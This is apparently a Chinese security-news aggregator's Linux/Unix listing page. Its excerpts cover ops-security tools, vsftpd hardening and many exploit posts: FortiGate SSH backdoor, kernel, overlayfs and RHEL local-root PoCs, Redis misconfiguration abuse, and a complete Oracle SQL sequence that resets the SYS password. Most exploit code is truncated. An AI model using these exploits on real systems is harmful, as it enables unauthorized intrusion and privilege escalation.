记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

运维安全相关辅助系统及工具

JSRC小课堂上,HRay和橙子师傅分享的,做个小笔记,以后可能会用到。 freeipa:ssh认证统一管理 巡风:一款适用于企业内网的漏洞快速应急、巡航扫描系统 opencanary:低交互蜜罐 suricata:一款开源IDS clamav:linux杀毒软件 rkhunter:rootkit检测工具 ossec:基于主机的入侵检测系统 常用的工具,如下: 网络数据包分析:wireshark、tcpdump 漏洞扫描工具:nmap、nessus、nexpose、awvs、openvas 主机安全安全:ossec、lynis、chkrootkit 日志分析 :splunk、elk 编程语言:python、php、c 系统:backtrack    
发布时间:2017-08-03 18:35 | 阅读:84838 | 评论:0 | 标签:Linux/Unix 系统加固 主机安全 入侵检测 运维安全

vsftpd相关安全配置及日志分析

vsftpd是运维常用一个服务,vsftpd 2-2.3.4版本存在后门漏洞,可以进行远程命令执行,获取服务器权限等。 并且如果vsftpd配置不当,可能会导致匿名用户直接访问上传下载等,相关风险配置: 1,匿名用户相关配置 anonymous_enable=YES/NO(YES) 控制是否允许匿名用户登入,YES 为允许匿名登入,NO 为不允许。默认值为YES。 write_enable=YES/NO(YES) 是否允许登陆用户有写权限。属于全局设置,默认值为YES。 no_anon_password=YES/NO(NO) 若是启动这项功能,则使用匿名登入时,不会询问密码。默认值为NO。 ftp_username=ftp 定义匿名登入的使用者名称。默认值为ftp。 anon_root=/var/ftp 使用匿
发布时间:2017-08-03 01:40 | 阅读:90078 | 评论:0 | 标签:Linux/Unix 系统加固 vsftpd安全配置 vsftpd日志分析 vsftpd漏洞 应急响应 日志分析

McAfee Virus Scan Enterprise for Linux – Remote Code Execution

from https://www.exploit-db.com/exploits/40911/''' Source: https://nation.state.actor/mcafee.html Vulnerabilities CVE-2016-8016: Remote Unauthenticated File Existence Test CVE-2016-8017: Remote Unauthenticated File Read (with Constraints) CVE-2016-8018: No Cross-Site Request Forgery Tokens CVE-2016-8019: Cross Site Scripting CVE-2016-8020: Authent
发布时间:2016-12-14 15:55 | 阅读:116150 | 评论:0 | 标签:Linux/Unix McAfee Remote Code Execution 远程代码执行

PostScript语言安全研究(一)ImageMagick新漏洞分析

Author:数据流(Flyin9_L) 前言:主流的东西太多了,还是研究一些非主流的语言好玩。PostScript(PS)是一种页面描述性语言,由Adobe开发,后由Apple推进发展。开始是应用于工业印刷绘图排版,现在广泛适用于打印机。虽然PostScript是比较冷门的语言,但与我们比较熟悉的PDF的部分元素也是由PostScript语言编写。利用PS的特性与弱点可对解析器与打印机进行攻击,而一些基础组件例如ImageMagick解析ps文件时会依赖外部解析器,所以也可对IM进行攻击。 0x00 PostScript语言入门 由于一般PS语言由机器自动生成,因此关于手写PS语言的资料非常罕见,只能从老外一些零星的资料与解析器的官方文档进行了解。这里我也顺便讲解下PS语言的基础,因为PS语言的中文资料寥寥
发布时间:2016-10-17 00:40 | 阅读:84317 | 评论:0 | 标签:Linux/Unix Others 漏洞

Tomcat 服务本地提权漏洞预警

from:长亭科技订阅号 10月1日,Tomcat爆出了一个本地提权漏洞。通过该漏洞,攻击者可以通过一个低权限的Tomcat用户获得系统的root权限。 漏洞相关信息:   CVE ID: CVE-2016-1240 漏洞原理: 在Debian系统的Linux上管理员通常利用apt-get进行包管理,deb包是Unixar的标准归档,讲包文件信息以及包内容,经过gzip和tar打包而成。 该问题出在Tomcat的deb包中,使 deb包安装的Tomcat程序会自动为管理员安装一个启动脚本,该脚本位于/etc/init.d/tomcat*, 跟踪代码如下:171     # Run the catalina.sh script as a daemon   set +
发布时间:2016-10-08 07:10 | 阅读:131854 | 评论:0 | 标签:Linux/Unix Others Tomcat 本地提权 漏洞 提权

Apache Continuum 1.4.2 – Multiple Vulnerabilities

# Exploit Title: Unauthenticated command injection - Apache Continuum # Google Dork: inurl::8080/continuum/ # Date: 04/06/2016 # Exploit Author: David Shanahan (@cyberpunksec) # Contact: http://www.procheckup.com/ # Vendor Homepage: https://continuum.apache.org/ # Software Link: https://continuum.apache.org/download.cgi # Version: 1.4.2 # Tested on: Debian
发布时间:2016-06-17 00:55 | 阅读:128946 | 评论:0 | 标签:Linux/Unix Others apache 漏洞

[+] Linux Kernel +3.8 0day PoC [+]

/* https://gist.github.com/PerceptionPointTeam/18b1e86d1c0f8531ff8f */ /* $ gcc cve_2016_0728.c -o cve_2016_0728 -lkeyutils -Wall */ /* $ ./cve_2016_072 PP_KEY */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <keyutils.h> #include <unistd.h> #include <time.h> #
发布时间:2016-01-21 01:00 | 阅读:119385 | 评论:0 | 标签:Linux/Unix 0day Kernel Linux poc

飞塔系统存在SSH后门 影响版本 4.0 – 5.0.7

from:tools.pwn.ren 今天 twitter 4 点钟的时候 有老外放出一个飞塔 os 的 exp ,说 4.0 – 5.0.7 !存在一个 ssh 的后门 进行了简单的测试,影响确实重大! 通过过Zoomeye搜索发现存在 64567台主机, 挑选一台进行测试 利用脚本 #!/usr/bin/env python # SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 # Usage: ./fgt_ssh_backdoor.py <target-ip> import socket import select import sys import paramiko from paramiko.py3
发布时间:2016-01-14 02:10 | 阅读:118762 | 评论:0 | 标签:Linux/Unix exp OS ssh 后门 飞塔 飞塔系统

飞塔SSH后门 进一步利用方法

from:tools.pwn.ren 昨天FortiGate爆了一个SSH Backdoor ,具体内容可以看这(http://tools.pwn.ren/2016/01/12/ssh-backdoor-for-fortigate-os-version-4-up-to-5-0-7.html) 那我们如何利用了?如何利用这个SSH 后门进入到内网了?好了这就是这篇文章要讲的东西。 这个后门获取到的是防火墙的root权限,就是所有防火墙的操作我们都可以做,这里我们利用防火墙的 vpn服务来进入到内网中 ,从而进行进一步渗透。 0X00 先看下用户组 show user group 0x01开启vpn config vpn pptp set status enable set eip 192
发布时间:2016-01-14 02:10 | 阅读:111658 | 评论:0 | 标签:Linux/Unix Backdoor fortigate OS ssh 后门 飞塔

Ubuntu 14.04 LTS, 15.10 overlayfs – Local Root Exploit

/* just another overlayfs exploit, works on kernels before 2015-12-26 # Exploit Title: overlayfs local root # Date: 2016-01-05 # Exploit Author: rebel # Version: Ubuntu 14.04 LTS, 15.10 and more # Tested on: Ubuntu 14.04 LTS, 15.10 # CVE : CVE-2015-8660 blah@ubuntu:~$ id uid=1001(blah) gid=1001(blah) groups=1001(blah) blah@ubuntu:~$ uname -a
发布时间:2016-01-06 12:10 | 阅读:119999 | 评论:0 | 标签:Linux/Unix overlayfs ubuntu exp

Gentoo Local Priv Escalation in QEMU

/* == virtfshell == * * Some distributions make virtfs-proxy-helper from QEMU either SUID or * give it CAP_CHOWN fs capabilities. This is a terrible idea. While * virtfs-proxy-helper makes some sort of flimsy check to make sure * its socket path doesn't already exist, it is vulnerable to TOCTOU. * * This should spawn a root shell eventually on
发布时间:2015-12-19 23:55 | 阅读:76879 | 评论:0 | 标签:Linux/Unix Gentoo Local

RHEL 7.0/7.1 – abrt/sosreport Local Root

#!/usr/bin/python # CVE-2015-5287 (?) # abrt/sosreport RHEL 7.0/7.1 local root # rebel 09/2015 # [user@localhost ~]$ python sosreport-rhel7.py # crashing pid 19143 # waiting for dump directory # dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143 # waiting for sosreport directory # sosreport: sosreport-localhost.localdomain-20151130194
发布时间:2015-12-04 06:55 | 阅读:107772 | 评论:0 | 标签:Linux/Unix abrt/sosreport local root RHEL

Java反序列化时对象注入可以造成代码执行漏洞

0x00 背景 这几天在zone看到了有人提及了有关于common-collections包的RCE漏洞,并且http://zone.wooyun.org/content/23849给出了具体的原理。作为一个业余的安全研究人员,除了会利用之外,还可以探究一下背后的原理。 0x01 原理 Java反序列化导致的漏洞原理上和PHP反序列一样,也是由于用户的输入可以控制我们传入的对象。如果服务端程序没有对用户可控的序列化代码进行校验而是直接进行反序列化使用,并且程序中运行一些比较危险的逻辑(如eval,登录验证等),就会触发一些意想不到的漏洞。实际上,这并不是什么新的问题了,有关于Java中的反序列化导致的漏洞可以看https://speakerdeck.com/player/2630612322be4a2696
发布时间:2015-11-12 11:45 | 阅读:221651 | 评论:0 | 标签:JSP Linux/Unix unserialize() 反序列号 注入 漏洞

redis配置不当可导致服务器被控制

服务器配置不当包括三个部分: 1.Redis服务使用ROOT账号启动 2.Redis服务无密码认证或者使用的是弱口令进行认证 3.服务器开放了SSH服务,而且允许使用密钥登录 简单的写下过程 测试环境 victim server CentOS6.6 192.168.1.11 attack server CentOS6.6+redis2.4 192.168.1.12 $ telnet 192.168.1.11 6379 Trying 192.168.1.11... Connected to 192.168.1.11. Escape character is '^]'. echo "Hey no AUTH required!" $21 Hey no AUTH required! quit +OK
发布时间:2015-11-11 05:35 | 阅读:156911 | 评论:0 | 标签:Linux/Unix Redis

Oracle 9i/10g Oracle越权修改SYS密码

exp地址https://www.exploit-db.com/exploits/4203/ 首先用一个低权限账户比如DBSNMP登录Oracle 然后执行SQL create or replace view bunkerview as select x.name,x.password from sys.user$ x left outer join sys.user$ y on x.name=y.name; update bunkerview set password='8A8F025737A9097A' where name='SYS'; drop view bunkerview; commit;就可以用sys账户密码为oracle开开心心地登录Oracle了
发布时间:2015-09-29 14:30 | 阅读:82847 | 评论:0 | 标签:JSP Linux/Unix Windows oracle

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云